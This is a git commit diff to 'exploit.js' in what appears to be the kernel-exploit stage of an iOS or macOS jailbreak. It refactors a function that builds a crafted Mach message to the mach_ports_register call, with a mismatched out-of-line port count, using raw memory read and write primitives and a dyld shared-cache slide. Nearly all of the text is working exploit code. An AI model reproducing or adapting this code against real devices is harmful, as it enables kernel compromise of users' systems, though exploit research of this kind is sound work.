diff options
| author | spv420 <spv@spv.sh> | 2022-08-01 13:45:45 -0400 |
|---|---|---|
| committer | spv420 <spv@spv.sh> | 2022-08-01 13:45:45 -0400 |
| commit | 7a206940e14b0d269744bd598be075e33ef19aea (patch) | |
| tree | bc257982f7ee4e291a183aa4153268974285eecd /src/stage4/kexp | |
| parent | 5ed6a7bb64ecf24c6dd12506688b43d9f33b65d2 (diff) | |
fuck
Diffstat (limited to 'src/stage4/kexp')
| -rwxr-xr-x | src/stage4/kexp/exploit.js | 43 |
1 files changed, 24 insertions, 19 deletions
diff --git a/src/stage4/kexp/exploit.js b/src/stage4/kexp/exploit.js index 8103639..327c813 100755 --- a/src/stage4/kexp/exploit.js +++ b/src/stage4/kexp/exploit.js @@ -277,28 +277,33 @@ function release_port_ptrs(port) { function r3gister(task, init_port_set, real_count, fake_count) { var mess = shit_heap(0x1000); -// var InP = mess; -// var OutP = mess; - - var InP = new Request(1, mess); - var OutP = new Reply(1, mess); - - write_u32(InP + 0x18, 1); - write_u32(InP + 0x1c, init_port_set); - write_u32(InP + 0x20, real_count); - write_u32(InP + 0x24, ((19 << 16) + (MACH_MSG_OOL_PORTS_DESCRIPTOR << 24))); - write_u32(InP + 0x28, read_u32(NDR_record + get_dyld_shc_slide() + 0x0)); - write_u32(InP + 0x2c, read_u32(NDR_record + get_dyld_shc_slide() + 0x4)); - write_u32(InP + 0x30, fake_count); - write_u32(InP + 0x0, 0x80001513); - write_u32(InP + 0x8, task); - write_u32(InP + 0xc, mig_get_reply_port()); - write_u32(InP + 0x14, 3403); - - var ret = mach_msg(InP, 0x3, 0x34, 0x2c, read_u32(InP + 0xc), MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); + var InP_ptr = mess; + var OutP = mess; + + var InP = new Request_r3(1, mess); + var InP_obj = InP.deref(); + + InP_obj.msgh_body.msgh_descriptor_count = 1; + InP_obj.init_port_set.address = init_port_set; + InP_obj.init_port_set.count = real_count; + InP_obj.init_port_set.disposition = 19; + InP_obj.init_port_set.deallocate = false; + InP_obj.init_port_set.type = MACH_MSG_OOL_PORTS_DESCRIPTOR; + InP_obj.NDR = read_buf(NDR_record + get_dyld_shc_slide(), 8); + InP_obj.init_port_setCnt = fake_count; + InP_obj.Head.msgh_bits = MACH_MSGH_BITS_COMPLEX | MACH_MSGH_BITS(19, MACH_MSG_TYPE_MAKE_SEND_ONCE); + InP_obj.Head.msgh_remote_port = task; + InP_obj.Head.msgh_local_port = mig_get_reply_port(); + InP_obj.Head.msgh_id = 3403; + + InP.write(InP_obj); + + var ret = mach_msg(InP.addy, 0x3, 0x34, 0x2c, InP_obj.Head.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL); if (ret == KERN_SUCCESS) { + // i'm not making a fucking class for this shit ret = read_u32(OutP + 0x24); } + return ret; } |